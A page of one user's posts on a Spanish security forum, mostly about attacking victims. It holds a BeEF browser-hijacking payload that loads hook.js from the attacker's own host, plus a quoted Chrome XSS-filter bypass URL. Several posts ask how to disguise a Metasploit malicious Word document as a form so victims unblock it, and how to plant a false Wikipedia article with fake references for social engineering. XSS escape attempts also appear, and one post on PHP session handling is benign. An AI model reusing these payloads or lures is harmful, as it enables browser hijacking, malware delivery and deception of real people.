elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recuerda que debes registrarte en el foro para poder participar (preguntar y responder)


  Mostrar Mensajes
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14
41  Foros Generales / Foro Libre / Sobre artículos en wikipedia en: 3 Noviembre 2017, 15:20 pm
Buenas! El capítulo 5 de la primera temporada de Mr. Robot muestra la idea de lo útil que puede ser tener un artículo de wikipedia para un ataque de ingeniería social. No se muy bien como se maneja la puntuación o reputación de cada wikipedista en la vida real, según en la serie el que hizo el artículo ya era wikipedista de antes con mucha reputación y por eso no le borraron el artículo. Yo hace un tiempo le había hecho un artículo a un amigo para su cumpleaños y duró 30 minutos hasta que lo quitaran... Además no entiendo exactamente que requisitos hay que cumplir para poder estar en wikipedia... Si agrego información falsa y pongo referencias falsas que validen lo que estoy escribiendo puede llegar a quedarse el artículo? O hay algo asi como una whitelist de referencias confiables? Muchas gracias.
42  Seguridad Informática / Seguridad / Re: Que opinan de usar session_regenerate_id() por cada petición a nuestra web? en: 1 Noviembre 2017, 05:37 am
Muchisimas gracias engel lex! La desventajas que mencionas son bastante malas al parecer. Pero si usas un fingerprint del browser el atacante que llegue a sniffar no podría enviar una petición con las mismas cabeceras que la víctima y tratar de recrear el hash en base a dichas cabeceras? Qué parte tomarías de las cabeceras para generar el hash y que funciones de php usarias? Perdón por preguntar tanto, pero se que tenés experiencia en desarrollo y me podes ayudar a entender una buena forma de manejar las sesiones.

Gracias nuevamente y saludos!
43  Seguridad Informática / Seguridad / Que opinan de usar session_regenerate_id() por cada petición a nuestra web? en: 1 Noviembre 2017, 05:10 am
Buenas! Los que sepan de PHP saben que session_regenerate_id() sirve para cambiar el ID de la sesión. Quería saber que opinaban del hecho de regenerar la sesión por cada cosa que hago, es decir por cada petición que mando. Si voy a login que cambie el id, si voy al panel de buscar usuarios, que se cambie el id, si voy a alguna funcion para listar algo, que se cambie, si voy a mi perfil, que se cambie... Qué opinan de hacer esto? Para mi es muy útil para mitigar robos de la cookie de sesión mediante sniffing cuando no usamos https... Pero tal vez hacer las cosas de éste modo tenga puntos en contra que no esté considerando.

Saludos!
44  Seguridad Informática / Nivel Web / Es posible bypassear ésto? en: 31 Octubre 2017, 21:01 pm
Buenas, quería saber si de alguna forma se puede concretar un XSS en éste caso... En el campo de búsqueda introduzco:

dfgsdfg" onload=alert(1);

y en el fuente sale:

Código
  1. <input id="searchInput" type="text" value="dfgsdfg&quot; onload=alert(1);" placeholder="Buscar..." maxlength="100" name="search"

como vemos convierte a html entities los " y me impide escaparme del atributo...

Ésto me parece imposible de bypassear y con el tag value no podría ejecutar script mandando javascript:alert(1)... Se les acurre alguna forma? Gracias y saludos!
45  Seguridad Informática / Bugs y Exploits / Mejorando el ataque de ingeniería social a través de Word malicioso en: 15 Octubre 2017, 07:24 am
Muy buenas! Hace 3 días subieron un nuevo método para atacar a través de Word que según dice evita las advertencias de seguridad:

https://null-byte.wonderhowto.com/how-to/execute-code-microsoft-word-document-without-security-warnings-0180495/

pero no me parece tan bueno ya que el usuario tiene que aceptar dos ventanitas, y la segunda te pregunta si queres abrir un ejecutable, y me parece que hay que ser muy tonto para darle que si a ese cartel... Yo todavía me sigo quedando con el ataque anterior:

https://www.rapid7.com/db/modules/exploit/windows/fileformat/office_word_hta

con éste si lo abre y está desbloquedo, te metes casi instantaneamente, y si cerras el word no perdes la conexión, ya que la conexión está en otro proceso,  el punto en contra es que si lo descargas siempre aparece como bloqueado y te sale una notificacion que te dice que si no lo vas a editar que no lo desbloquees, pero que si vas a editar si. Entonces pensé en hacer que el archivo de word sea un formulario para descargar, completar y enviar, cosa que obligue a la victima a deslbloquearlo si quiere editar. El asunto es que el word que genera el metasploit esta todo en blanco con un cuadradito en el medio, y me gustaría poder agregar texto (un formulario) antes de que aparezca ese cuadradito. Pero no pude, traté de agregar texto y al agregarlo el exploit deja de funcionar. Tienen idea de cómo poder editar la apariencia del word que genera metasploit?

Saludos y gracias!
46  Seguridad Informática / Seguridad / Re: Cómo incluir un script de otra página utilizando "javascript:"? en: 12 Octubre 2017, 22:28 pm
Cuando el hook.js se llega a cargar en el navegador de la víctima ya se secuestra el navegador, no hace falta nada más. Recién estuve fijándome lo que me decías de revisar las solicitudes, y ahí está el tema... Desde la consola del navegador no se envía ninguna consulta... Y la consola solo la estaba usando para probar, pero voy a ver que consulta se hace cuando mando directamente el enlace junto con esas lineas de codigo. Cuando lo pueda resolver escribo por aca. Saludos!


Actualizo!

Ya pude resolver el problema, en éste caso intente algo distinto. Utilicé:

javascript:open(//mi_dns/beef.html/)

y adentro de beef.html tengo:

Código:
<html>
<head>
<script src="http://mi_dns:3000/hook.js"></script>
</head>
<body>
</body>
</html>

con ésto pude secuestrar satisfactoriamente el navegador de la víctima a través de beEF bypasseando los ultimos filtros de chrome. Después me gustaría hacer un video explicando cómo lograr ésto y que hay que tener en cuenta para lograrlo.

Saludos!

 
47  Seguridad Informática / Seguridad / Re: Cómo incluir un script de otra página utilizando "javascript:"? en: 12 Octubre 2017, 21:58 pm
Hola engel! Muchas gracias, es bastante parecido a lo que hice en mi tercer intento, pero no me está funcionando. Siendo más específico, lo que estaba queriendo hacer es incluir el hook.js de beEF utilizando éste bypass para los filtros de las versiones más nuevas de Chrome:

https://brutelogic.com.br/blog/chrome-xss-auditor-svg-bypass/

Que sería el siguiente:

https://brutelogic.com.br/xss.php?a=guest!+Watch+the+video+before+proceeding:%3Cbr%3E%3Cbr%3E%3Csvg+width=12cm+height=9cm%3E%3Ca%3E%3Cimage+href=//brutelogic.com.br/yt.jpg+/%3E%3Canimate+attributeName=href+values=javas%26%2399ript:alert(1)%3E

entonces yo pense que al final en vez de usar javascript:alert(1), podría incluir algo como lo que me mandaste vos, pero cuando pruebo en la consola del chrome no logro secuestrar mi navegador. Mira:



según lo que me responde la consola, el script parece haberse formado correctamente, pero sin embargo no logro secuestrar el navegador, sino en Online Browsers dentro del beEF ya tendría que ver la IP del navegador...

Tenés algúna idea sobre como resolver ésto? Saludos!
48  Seguridad Informática / Seguridad / Cómo incluir un script de otra página utilizando "javascript:"? en: 12 Octubre 2017, 14:53 pm
Buenas! la forma que conozco para agregar un script de otra página es:

Código
  1. <script src="www.web.com/script.js"></script>

pero si me encuentro realizando un XSS y necesito usar si o si "javascript:" y no al tag <script>, no sabría como incluir un js de otra pagina...

probé:

Código
  1. javascript:www.web.com/script.js

y no funciono,
tampoco funcionó:

Código
  1. javascript:src="www.web.com/script.js"

tampoco funcionó:

Código
  1. javascript:var script = document.createElement('script'); script.src = 'www.web.com/script.js'; document.head.appendChild(script);

Quería saber si tenían algún otra idea. Gracias desde ya!
49  Seguridad Informática / Nivel Web / Re: Firefox es inseguro contra ataques XSS reflejados? en: 30 Septiembre 2017, 23:27 pm
Muchisimas gracias WHK! Entre ayer y hoy leí tu post sobre el arte del bypassing, y agregando ésto que me respondiste hoy me hiciste abrir la cabeza un montón. No tenía idea de la segunda capa de comprobación, y que solo bypasseando a ésta ya es suficiente para bypassear el sistema completo del navegador o de ISS. Estaría genial que escribieras un libro en español sobre todo lo que sabes de bypassing, ya que si bien hay mucha información dando vueltas, la mayoría está en inglés, y no está todo tan bien organizado y en un solo lugar como el post que hiciste por ejemplo. Gracias nuevamente.

Saludos!
50  Foros Generales / Foro Libre / Re: Mi experiencia en un desafío de la Eko Party en: 30 Septiembre 2017, 07:58 am
Nono, el que decís vos creo que era el de ESET. Había que registrarse en desafioseset.com, ahora ya no encuentro la pagina, seguramente ya cerraron el server.

Saludos!
Páginas: 1 2 3 4 [5] 6 7 8 9 10 11 12 13 14
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines